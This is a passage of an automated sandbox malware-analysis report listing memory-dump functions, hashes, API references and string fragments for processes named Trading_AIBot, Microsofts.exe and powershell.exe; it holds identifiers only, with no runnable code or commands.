Source File: 00000009.00000002.2811861552.0000000002580000.00000040.00000800.00020000.00000000.sdmp, Offset: 02580000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2580000_Trading_AIBot.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a8b385ebff69f361b4cb2e5e366b1c85ad4f1ea35a129f48f3d0e6e633f2d5ef
Instruction ID: 902c035153847f6963cacdddd309945950f603cf43763a4892b89c37d84ce280
Opcode Fuzzy Hash: a8b385ebff69f361b4cb2e5e366b1c85ad4f1ea35a129f48f3d0e6e633f2d5ef
Instruction Fuzzy Hash: B6B1DC74A01229CFDB64EF68C994B9DB7B2BB49304F1085EAD40DA7350DB71AE85CF10

Function 02587D04 Relevance: .1, Instructions: 113COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2811861552.0000000002580000.00000040.00000800.00020000.00000000.sdmp, Offset: 02580000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2580000_Trading_AIBot.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e3d09a0031319c01b58142d4877db9f5a7ca2ac2838018c03ff1383a20abeec0
Instruction ID: faa1f0515c11893000d25a64f0a7f12cf4698ab5e767a6fd946b23fedc9c1861
Opcode Fuzzy Hash: e3d09a0031319c01b58142d4877db9f5a7ca2ac2838018c03ff1383a20abeec0
Instruction Fuzzy Hash: E141E075D002489FDB14DFE9D884AEEFBB2BF89310F24806AE409BB254DB709946CF54

Function 025865C0 Relevance: .1, Instructions: 109COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2811861552.0000000002580000.00000040.00000800.00020000.00000000.sdmp, Offset: 02580000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2580000_Trading_AIBot.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c9d1b4a871bb03ab707a40eb5179c6ea420d3d9e9bba5fd43fbdc68a9ba0e8cc
Instruction ID: 0243ee7abcb86d8745e0781ed28a00e50d5f30b3a524d0124bd8bf8ee1aeee21
Opcode Fuzzy Hash: c9d1b4a871bb03ab707a40eb5179c6ea420d3d9e9bba5fd43fbdc68a9ba0e8cc
Instruction Fuzzy Hash: A341AB78D01218CFDF14EFA9D494AADBBF5BB49300F10802AE469BB3A4DB745946CF58

Function 02587BC0 Relevance: .1, Instructions: 98COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2811861552.0000000002580000.00000040.00000800.00020000.00000000.sdmp, Offset: 02580000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2580000_Trading_AIBot.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ee6272d70f1f11295eac4c6f52d739f6a66b8d95bb6bcb8d97d5cde934f76cd8
Instruction ID: 02d0f4e7877c787e19a441c5a2a114c8d072b828e94cfd31925977f56f3c1502
Opcode Fuzzy Hash: ee6272d70f1f11295eac4c6f52d739f6a66b8d95bb6bcb8d97d5cde934f76cd8
Instruction Fuzzy Hash: 6341C475E002089FDB04DFA9D894BEEBBB2BF89301F108069E516B72A0DB759941CF54

Function 02587D10 Relevance: .1, Instructions: 89COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2811861552.0000000002580000.00000040.00000800.00020000.00000000.sdmp, Offset: 02580000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2580000_Trading_AIBot.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 070b4cb636a5b93ee2d4fe86771c67962d20e84b9097eb2e978c9960eea46255
Instruction ID: 2b750e7e5eb9d2540e5595528a93972a33d46ede1fb451e7f102d097dabc971d
Opcode Fuzzy Hash: 070b4cb636a5b93ee2d4fe86771c67962d20e84b9097eb2e978c9960eea46255
Instruction Fuzzy Hash: 4F41ACB5D002489FDB14DFAAD984A9EFFB5BF48304F24802AE418BB250DB749985CF54

Function 025873A0 Relevance: .1, Instructions: 82COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2811861552.0000000002580000.00000040.00000800.00020000.00000000.sdmp, Offset: 02580000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2580000_Trading_AIBot.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e82e6871213d7e34a04d093a509b15cb3848fb3bd53a00f8343e6b51ee97b483
Instruction ID: dfe5fac3e0a937cb2c1e07c02bab8295714416613b0b80258e078b3b2f92f7d6
Opcode Fuzzy Hash: e82e6871213d7e34a04d093a509b15cb3848fb3bd53a00f8343e6b51ee97b483
Instruction Fuzzy Hash: 9131E575E0020A8FCB09EFB5C450AEEBBB2AF89300F1095A9D415B7394CB765D46CF54

Function 025873B0 Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2811861552.0000000002580000.00000040.00000800.00020000.00000000.sdmp, Offset: 02580000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2580000_Trading_AIBot.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2bcc5f77465a89b3b59848027c86ad3e3d21298c0bb62329dab73f15424931d3
Instruction ID: 7674c15521cc97478e5887adb971dda2251a530bfeb88a12019d759aa315f4f1
Opcode Fuzzy Hash: 2bcc5f77465a89b3b59848027c86ad3e3d21298c0bb62329dab73f15424931d3
Instruction Fuzzy Hash: 3F21CE75E0020A8BCB08EBA5D450AEEB7B6BB89300F609469D415B7394DB76AD42CF64

Function 025851F7 Relevance: .1, Instructions: 70COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2811861552.0000000002580000.00000040.00000800.00020000.00000000.sdmp, Offset: 02580000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2580000_Trading_AIBot.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ad423acc6062a6a9320113104a14b0dcb400f4f8416b9b20ada945759c7ec1c3
Instruction ID: f620f1fa8909a11e084ce3b5563b6c3fd4a74b5bfc39cb6092eba1335fcd902d
Opcode Fuzzy Hash: ad423acc6062a6a9320113104a14b0dcb400f4f8416b9b20ada945759c7ec1c3
Instruction Fuzzy Hash: 8721D4B1C093959FD702AF74896839E7FB1EB07305F0548EBC441A7192D7784648CB96

Function 02585238 Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2811861552.0000000002580000.00000040.00000800.00020000.00000000.sdmp, Offset: 02580000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2580000_Trading_AIBot.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0484509436c3d3d3b5821b0516780730ad23b019bc20021b96179f8df3af9fb4
Instruction ID: a0b611c7971eae5a6d354c3d9d3f63d957b2e701b3c1641c8f6660fcdebb6bc4
Opcode Fuzzy Hash: 0484509436c3d3d3b5821b0516780730ad23b019bc20021b96179f8df3af9fb4
Instruction Fuzzy Hash: 4D011AB5C00219DFDB14FFB5C5187AEBBB0FB06306F4198AA8416B3290DBB84684CF95

Function 025874F0 Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2811861552.0000000002580000.00000040.00000800.00020000.00000000.sdmp, Offset: 02580000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2580000_Trading_AIBot.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2fbe147a600777d54717d4ebc045d2ff04a6db9ae1106cc9a86b770ce520437c
Instruction ID: 467397dc8756d149e68c7f5772b7f35acf427999c6b3d91f7cfe1d32a02f2dfb
Opcode Fuzzy Hash: 2fbe147a600777d54717d4ebc045d2ff04a6db9ae1106cc9a86b770ce520437c
Instruction Fuzzy Hash: EC0162F5D052049FD714EF74E944A5CBFB0EB0A215F1002AAE528A73B2E7708946DB95

Function 02587499 Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2811861552.0000000002580000.00000040.00000800.00020000.00000000.sdmp, Offset: 02580000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2580000_Trading_AIBot.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9212692306b8a67395c5bc3378b04aed2e0a1519f229ba88b43e460bc66d35d9
Instruction ID: da9091c386f7e51af79875dab27ae5cf4f2e4afb91bb897082e3b724c9d43ab4
Opcode Fuzzy Hash: 9212692306b8a67395c5bc3378b04aed2e0a1519f229ba88b43e460bc66d35d9
Instruction Fuzzy Hash: 8CF082F49002049FD305EF64D584A5C7FB1FB06209F1100EAD90597372E7319D4ACB51

Function 02586C3E Relevance: .0, Instructions: 30COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2811861552.0000000002580000.00000040.00000800.00020000.00000000.sdmp, Offset: 02580000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2580000_Trading_AIBot.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7537c452df5a0c5ae16544ad91a3c72f2beb1697fba4eeb96cb20bf5c4cec42f
Instruction ID: 3a403d4b4cedd8b08ce8af88bb35eea4f5b0093481e244c81264cba496ca30e1
Opcode Fuzzy Hash: 7537c452df5a0c5ae16544ad91a3c72f2beb1697fba4eeb96cb20bf5c4cec42f
Instruction Fuzzy Hash: 13F0F8B8900155DFCB68EFA4D5487ACBBB0EF4A312F0464A7D549B7260CB309985CF24

Function 02586757 Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2811861552.0000000002580000.00000040.00000800.00020000.00000000.sdmp, Offset: 02580000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2580000_Trading_AIBot.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ec6b01a710056b7ae0645e9608304b01ccd4b3c77407cd1280e6dea0248b0eba
Instruction ID: 464ab71ba150af791e82c237967cb3fc3e70762d4a2a1c862ed391976529a3ea
Opcode Fuzzy Hash: ec6b01a710056b7ae0645e9608304b01ccd4b3c77407cd1280e6dea0248b0eba
Instruction Fuzzy Hash: 5AE022B1908289EFDB10EFB0DA15B9D7B71EB02205F0040AED406A7252EB711F08DB92

Function 025874A8 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2811861552.0000000002580000.00000040.00000800.00020000.00000000.sdmp, Offset: 02580000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2580000_Trading_AIBot.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: af11611436bcbefa1b3608729a143c10c32fb3c7aefaa6f3170ed0c3f6d8709e
Instruction ID: cac0ba04f764bb119a208ca76fa27d848384d07462917a5c796a02d8756ae30e
Opcode Fuzzy Hash: af11611436bcbefa1b3608729a143c10c32fb3c7aefaa6f3170ed0c3f6d8709e
Instruction Fuzzy Hash: 22E0EDB89002049FC748EF68D544A5DBBB0FB49301F1041A9D80897361E7309D46CB51

Function 02586768 Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2811861552.0000000002580000.00000040.00000800.00020000.00000000.sdmp, Offset: 02580000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2580000_Trading_AIBot.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5abf1df14ed1b478fa107587932000a50d478790605235a828aa9a5f28297cc3
Instruction ID: dff0441bfd8fbd9117a02bf2c48e3554e146b37a3a7864685f4ea869bf98f089
Opcode Fuzzy Hash: 5abf1df14ed1b478fa107587932000a50d478790605235a828aa9a5f28297cc3
Instruction Fuzzy Hash: 8FE0267190010CEFDB00EFB4D605B5DB7B8EB01304F0041ADD405A3210DB311E04DB80

Function 02586D40 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2811861552.0000000002580000.00000040.00000800.00020000.00000000.sdmp, Offset: 02580000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2580000_Trading_AIBot.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c8a90b3b0b9bb0598ef1f9904efde38664b08683248f6e58f0ead212b23a1534
Instruction ID: b4b020246d950ef2d4560224067ab2e4bce9e324af1d43b88626b2f4a1306bc1
Opcode Fuzzy Hash: c8a90b3b0b9bb0598ef1f9904efde38664b08683248f6e58f0ead212b23a1534
Instruction Fuzzy Hash: F9D02B718093C24BD7269B31190C758BF30D703109F0600CBD4505B063D7141449CBA2

Function 02586DC3 Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2811861552.0000000002580000.00000040.00000800.00020000.00000000.sdmp, Offset: 02580000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2580000_Trading_AIBot.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 31ec39f8719b621852239f5a1e75019497a67457cbf9ba1bffcd2cf13b60b322
Instruction ID: c2b8a69ef4c5909959b81c65466d58c03231603587ba4b97fb5cd3daee4914b6
Opcode Fuzzy Hash: 31ec39f8719b621852239f5a1e75019497a67457cbf9ba1bffcd2cf13b60b322
Instruction Fuzzy Hash: CEC0223080E008CAE3124F0AA82A378F6CCE701326F0C228E880822304921500002209

Function 02587500 Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2811861552.0000000002580000.00000040.00000800.00020000.00000000.sdmp, Offset: 02580000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2580000_Trading_AIBot.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 091dad3e675796c0a16dabc094873a9d64a616a54e5e23ff6b9c8f68d6f04644
Instruction ID: f2e29e06df70c8403df26d3215cb85f6ed9146cb9b2d8ac78e1c429d2a7e4251
Opcode Fuzzy Hash: 091dad3e675796c0a16dabc094873a9d64a616a54e5e23ff6b9c8f68d6f04644
Instruction Fuzzy Hash: F4C080F08003089BD714FFB5A804B1DB7BCE706217F00016DF51853100D7715840D6BA

Function 02586D50 Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2811861552.0000000002580000.00000040.00000800.00020000.00000000.sdmp, Offset: 02580000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2580000_Trading_AIBot.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 52b4467ccf57fe481461f2427e6b26b273a27bdcefa1facdd9c3c494840a4545
Instruction ID: 532f407c7432ec9843ef5fe4734376f8d9b1481d1aef23eaeadd17f09f0c4f97
Opcode Fuzzy Hash: 52b4467ccf57fe481461f2427e6b26b273a27bdcefa1facdd9c3c494840a4545
Instruction Fuzzy Hash: 67C080B0C05348DBC324DFA5A404F1DB77CE702306F40016DE91853101E7714440C6F5

Function 02586DDD Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2811861552.0000000002580000.00000040.00000800.00020000.00000000.sdmp, Offset: 02580000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2580000_Trading_AIBot.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 921ab6e0b5d2d77e3713767dd0d00d25f7e0ffef9f818ed8fbdc50ec875179aa
Instruction ID: 570fc590cd617a0c39ad1e003662c8b330d632ea330e163afb23e5fb39ace7af
Opcode Fuzzy Hash: 921ab6e0b5d2d77e3713767dd0d00d25f7e0ffef9f818ed8fbdc50ec875179aa
Instruction Fuzzy Hash: E5A02430D1F00D430F31D40014515F0770C401731575015DCFC4C331175143C03100DC

Analysis Process: Microsofts.exePID: 3248, Parent PID: 3080COMMON

Execution Graph

Execution Coverage:	20.3%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	10%
Total number of Nodes:	40
Total number of Limit Nodes:	5

Executed Functions

Function 0283C168 Relevance: 2.0, APIs: 1, Instructions: 503
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 0000000A.00000002.3376861216.0000000002830000.00000040.00000800.00020000.00000000.sdmp, Offset: 02830000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2830000_Microsofts.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8333e7481dde593a63a2439fc5f417ac1e7c81c20f460dc740ff4105cd89c736
Instruction ID: d183cc17662314259f7a47d9732d63afecf30e1840b25173359ddff7c64dce4a
Opcode Fuzzy Hash: 8333e7481dde593a63a2439fc5f417ac1e7c81c20f460dc740ff4105cd89c736
Instruction Fuzzy Hash: 62222C79E00219CFDB15DFA8C884B9DBBB2BF88304F1481AAD409E7355DB359986CF90

Function 0283C76C Relevance: 1.6, APIs: 1, Instructions: 62
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL(00000000), ref: 0283C8AE

Memory Dump Source

Source File: 0000000A.00000002.3376861216.0000000002830000.00000040.00000800.00020000.00000000.sdmp, Offset: 02830000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2830000_Microsofts.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 29f06e19591b7efd764a7e6004ace4c2b7a23e291537d96427c66db5ced3d8dc
Instruction ID: c4aa153c41478cb301a7d8d96af60ed6c48bf7d0522ffde6fa84633c813cd6dd
Opcode Fuzzy Hash: 29f06e19591b7efd764a7e6004ace4c2b7a23e291537d96427c66db5ced3d8dc
Instruction Fuzzy Hash: 10114F7DE002099FDB15DBE8D484FADB7B5FB88309F548166E848F7245D7309942CBA1

Function 00EED030 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.3375483318.0000000000EED000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EED000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_eed000_Microsofts.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 72b1bde513b6f135da901e32ba9e15dfb8b3a4d48d14e48e4df4cc20ac94e92a
Instruction ID: 511d93f6ebbe43c5b96660daf1805c023fde55786e2e7316105c588959c1cae3
Opcode Fuzzy Hash: 72b1bde513b6f135da901e32ba9e15dfb8b3a4d48d14e48e4df4cc20ac94e92a
Instruction Fuzzy Hash: A4213771508288DFDB10DF14DDC0B16BB66FB84318F28C56DE8091B282C376D847CA61

Function 00EED005 Relevance: .1, Instructions: 71COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.3375483318.0000000000EED000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EED000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_eed000_Microsofts.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a3f7273bcbcd2fe184e7a9c0132b5160c3d4c27c42dcd95522dc9215e898bd4e
Instruction ID: ef3452d660b746dca021744c9004800fd0df6233d76e4c8cccd8731de4dfe856
Opcode Fuzzy Hash: a3f7273bcbcd2fe184e7a9c0132b5160c3d4c27c42dcd95522dc9215e898bd4e
Instruction Fuzzy Hash: FB212B7150D3C49FCB03DB24D990711BF71AB46214F2985EBD8898F2A7C33A985ACB62

Analysis Process: powershell.exePID: 1584, Parent PID: 3404COMMON

Execution Graph

Execution Coverage:	6.3%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	3
Total number of Limit Nodes:	0

Executed Functions

Function 00B3B48B Relevance: 4.0, Strings: 3, Instructions: 253
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

YIr^, xrefs: 00B3B557
p.x%, xrefs: 00B3B68C
{YIr^, xrefs: 00B3B6F0, 00B3B6F5

Memory Dump Source

Source File: 0000000B.00000002.2301870550.0000000000B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_b30000_powershell.jbxd

Similarity

API ID:
String ID: p.x%${YIr^$YIr^
API String ID: 0-3874789119
Opcode ID: 3c7c94333705db0c97372138624f6872d11439795df8cdfacb9165e849b52720
Instruction ID: 8a33614d9d83f8ce2b6707e770be95070382c341ccbfb84b4bc6239e28e1077a
Opcode Fuzzy Hash: 3c7c94333705db0c97372138624f6872d11439795df8cdfacb9165e849b52720
Instruction Fuzzy Hash: C99152B1B006159BDB19EFB588115AFB7E3EF84B00F14892DD116AB340DF36AE069BC5

Function 00B3B490 Relevance: 4.0, Strings: 3, Instructions: 252
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

YIr^, xrefs: 00B3B557
p.x%, xrefs: 00B3B68C
{YIr^, xrefs: 00B3B6F0, 00B3B6F5

Memory Dump Source

Source File: 0000000B.00000002.2301870550.0000000000B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_b30000_powershell.jbxd

Similarity

API ID:
String ID: p.x%${YIr^$YIr^
API String ID: 0-3874789119
Opcode ID: 9f15eb4463a6fe2c130165d904d4c8a6b802650dbd6ab700bf77ceae4a539352
Instruction ID: 1241cadd7f2442bcce0aafed195970efa3157abe062b831e925711d7cbb68b53
Opcode Fuzzy Hash: 9f15eb4463a6fe2c130165d904d4c8a6b802650dbd6ab700bf77ceae4a539352
Instruction Fuzzy Hash: 2F9152B1B006159BDB19EFB588115AFB7E3EF84B00F14892DD116AB340DF36AE069BC5

Function 070C2308 Relevance: 10.7, Strings: 8, Instructions: 664COMMON

Download Yara Rule

Strings

Jk, xrefs: 070C23C5
Jk, xrefs: 070C25F6
Jk, xrefs: 070C25EA
Jk, xrefs: 070C259E
rk, xrefs: 070C254F
Jk, xrefs: 070C237F
Jk, xrefs: 070C23D1
rk, xrefs: 070C2559

Memory Dump Source

Source File: 0000000B.00000002.2426745007.00000000070C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_70c0000_powershell.jbxd

Similarity

API ID:
String ID: Jk$Jk$Jk$Jk$Jk$Jk$rk$rk
API String ID: 0-2133941804
Opcode ID: fbe6072b557acd632cbcc2c7411b557b611c6355a51645741a49d7bc04f74b55
Instruction ID: f820adc3c55be39cd5ad6ca70974602abcb4a5de0afc857da9996cf21191ff88
Opcode Fuzzy Hash: fbe6072b557acd632cbcc2c7411b557b611c6355a51645741a49d7bc04f74b55
Instruction Fuzzy Hash: 002226B1B00206DFDB61DF68C8516AE7BE6BF89210F1482BEE515DB641DB35CC41CBA2

Function 082B755B Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 51
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetThreadToken.KERNELBASE ref: 082B75C2

Strings

p.x%, xrefs: 082B757A

Memory Dump Source

Source File: 0000000B.00000002.2502099111.00000000082B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 082B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_82b0000_powershell.jbxd

Similarity

API ID: ThreadToken
String ID: p.x%
API String ID: 3254676861-3561632723
Opcode ID: 46069396e0c10938b4292989cc0de31bacde320603d3df14e1370cb53beb6ab1
Instruction ID: a437fc38e311a06606af3d7d13198a7e12247e20f56dd7709aba2ea376fb5f27
Opcode Fuzzy Hash: 46069396e0c10938b4292989cc0de31bacde320603d3df14e1370cb53beb6ab1
Instruction Fuzzy Hash: 201158B18003488FDB10DFAAD888BDEFFF4AF88320F14845AD419A7250D774A944CFA1

Function 082B7560 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 48
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetThreadToken.KERNELBASE ref: 082B75C2

Strings

p.x%, xrefs: 082B757A

Memory Dump Source

Source File: 0000000B.00000002.2502099111.00000000082B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 082B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_82b0000_powershell.jbxd

Similarity

API ID: ThreadToken
String ID: p.x%
API String ID: 3254676861-3561632723
Opcode ID: ddf1933ceec2a1426561c6165287f4cc475e7d46a7da2bb20c3aa6f3cdb48c72
Instruction ID: 5473e71e46725552c64e1ea57f108e15ceccdad5d91dd35d2031a0e3fef584a0
Opcode Fuzzy Hash: ddf1933ceec2a1426561c6165287f4cc475e7d46a7da2bb20c3aa6f3cdb48c72
Instruction Fuzzy Hash: A31125B59002498FDB10DF9AD884BDEFBF8AB88320F148419D519A7250D774A944CFA0

Function 00B3BAC0 Relevance: 1.4, Strings: 1, Instructions: 155
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

p.x%, xrefs: 00B3BAE5

Memory Dump Source

Source File: 0000000B.00000002.2301870550.0000000000B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_b30000_powershell.jbxd

Similarity

API ID:
String ID: p.x%
API String ID: 0-3561632723
Opcode ID: 0f07d0d30c6764d1cecd33f5fde20844427601335fca033c6988bc6368c0f6f5
Instruction ID: faf94a8a581767353d1a7959e4377bbd6496e7f9609cb86b9916ac9f52245135
Opcode Fuzzy Hash: 0f07d0d30c6764d1cecd33f5fde20844427601335fca033c6988bc6368c0f6f5
Instruction Fuzzy Hash: 8561F471E00249DFDB14DFA9D584B9DFBF1EF88310F24816AE909AB264EB349D41CB50

Function 00B3BABB Relevance: 1.4, Strings: 1, Instructions: 148
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

p.x%, xrefs: 00B3BAE5

Memory Dump Source

Source File: 0000000B.00000002.2301870550.0000000000B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_b30000_powershell.jbxd

Similarity

API ID:
String ID: p.x%
API String ID: 0-3561632723
Opcode ID: 001bd05bf0788d165dd14ab5dbe185c8fde8140c2045c7ea2b97aa419b2f82d0
Instruction ID: b76174fae819205f90de82603549ecda98c0ed8f3e559d24f467835b77ed83e2
Opcode Fuzzy Hash: 001bd05bf0788d165dd14ab5dbe185c8fde8140c2045c7ea2b97aa419b2f82d0
Instruction Fuzzy Hash: 8251F571E00248DFDB14DFA9D484A9DFBF5EF88310F24816AE909AB264EB349D45CB51

Function 00B393F0 Relevance: 1.3, Strings: 1, Instructions: 80
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

p.x%, xrefs: 00B3941C

Memory Dump Source

Source File: 0000000B.00000002.2301870550.0000000000B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_b30000_powershell.jbxd

Similarity

API ID:
String ID: p.x%
API String ID: 0-3561632723
Opcode ID: 0f44ab9130baf8506abda6417be6183d46243b8e2f66caf8bf424c36b1c3f5a6
Instruction ID: 8bedd9d3f0b1449845a32cc5214eb10b91e4a404fdb0d9191746d4cb59c27e88
Opcode Fuzzy Hash: 0f44ab9130baf8506abda6417be6183d46243b8e2f66caf8bf424c36b1c3f5a6
Instruction Fuzzy Hash: 31319C719057449EEB60DF6AD0883CAFBF2EF88320F28845AD45D9B345D6B46882CB91

Function 00B39400 Relevance: 1.3, Strings: 1, Instructions: 69
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

p.x%, xrefs: 00B3941C

Memory Dump Source

Source File: 0000000B.00000002.2301870550.0000000000B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_b30000_powershell.jbxd

Similarity

API ID:
String ID: p.x%
API String ID: 0-3561632723
Opcode ID: b5226ba5b7c41da9975a9908c98839053d7980265e595447d01facf06738f50d
Instruction ID: 795cf55ee34351454eca85bd360b0525ce30cd653d87416dac477f722bab6dfe
Opcode Fuzzy Hash: b5226ba5b7c41da9975a9908c98839053d7980265e595447d01facf06738f50d
Instruction Fuzzy Hash: 512188B09057448EEB60CF6AC08838AFBF2EF98310F28C05AD85D97345D6B4A8818B61

Function 00B3DCE3 Relevance: 1.3, Strings: 1, Instructions: 53COMMON

Download Yara Rule

Strings

;/Ir^, xrefs: 00B3DC51

Memory Dump Source

Source File: 0000000B.00000002.2301870550.0000000000B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_b30000_powershell.jbxd

Similarity

API ID:
String ID: ;/Ir^
API String ID: 0-2408198257
Opcode ID: 27fb91a35da579328a4cf2021896aca37209a24c347b25ec4684b021dd772630
Instruction ID: 09ecb3d09a8c4e210a4397f190ce65ddde700b5d9edab7c362ab49423cf23e37
Opcode Fuzzy Hash: 27fb91a35da579328a4cf2021896aca37209a24c347b25ec4684b021dd772630
Instruction Fuzzy Hash: 1E01F236B105149BCB049A69F8115EEBBE9DFC8332F6480BBD51AD7700DF3199128BE0

Function 00B3DC93 Relevance: 1.3, Strings: 1, Instructions: 34COMMON

Download Yara Rule

Strings

+/Ir^, xrefs: 00B3DCBE

Memory Dump Source

Source File: 0000000B.00000002.2301870550.0000000000B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B30000, based on PE: false

Joe Sandbox IDA Plugin

